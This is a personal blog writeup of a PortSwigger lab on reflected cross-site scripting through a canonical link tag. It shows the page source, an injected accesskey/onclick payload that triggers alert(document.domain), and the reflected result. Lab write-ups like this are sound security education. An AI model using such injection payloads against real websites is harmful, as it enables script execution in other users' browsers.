Siunam's Website

My personal website

Home About Blog Writeups Projects E-Portfolio

Reflected XSS in canonical link tag | Dec 31, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: Reflected XSS in canonical link tag! Without further ado, let’s dive in.

Background

This lab reflects user input in a canonical link tag and escapes angle brackets.

To solve the lab, perform a cross-site scripting attack on the home page that injects an attribute that calls the alert function.

To assist with your exploit, you can assume that the simulated user will press the following key combinations:

Please note that the intended solution to this lab is only possible in Chrome.

Exploitation

Home page:

View source page:

<head>
    <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
    <link href=/resources/css/labsBlog.css rel=stylesheet>
    <link rel="canonical" href='https://0a2200b504a6441cc040ccd100c20002.web-security-academy.net/'/>
    <title>Reflected XSS in canonical link tag</title>
</head>

In here, we can see that there is a <link> tag is using canonical link tag.

To exploit it, we can try to inject accesskey attribute with an onclick event:

/?'accesskey='x'onclick='alert(document.domain)

Result:

<link rel="canonical" href='https://0a2200b504a6441cc040ccd100c20002.web-security-academy.net/?'accesskey='x'onclick='alert(document.domain)'/>

Now press:

Note: It only works in Chrome browser.

Nice!

What we’ve learned:

  1. Reflected XSS in canonical link tag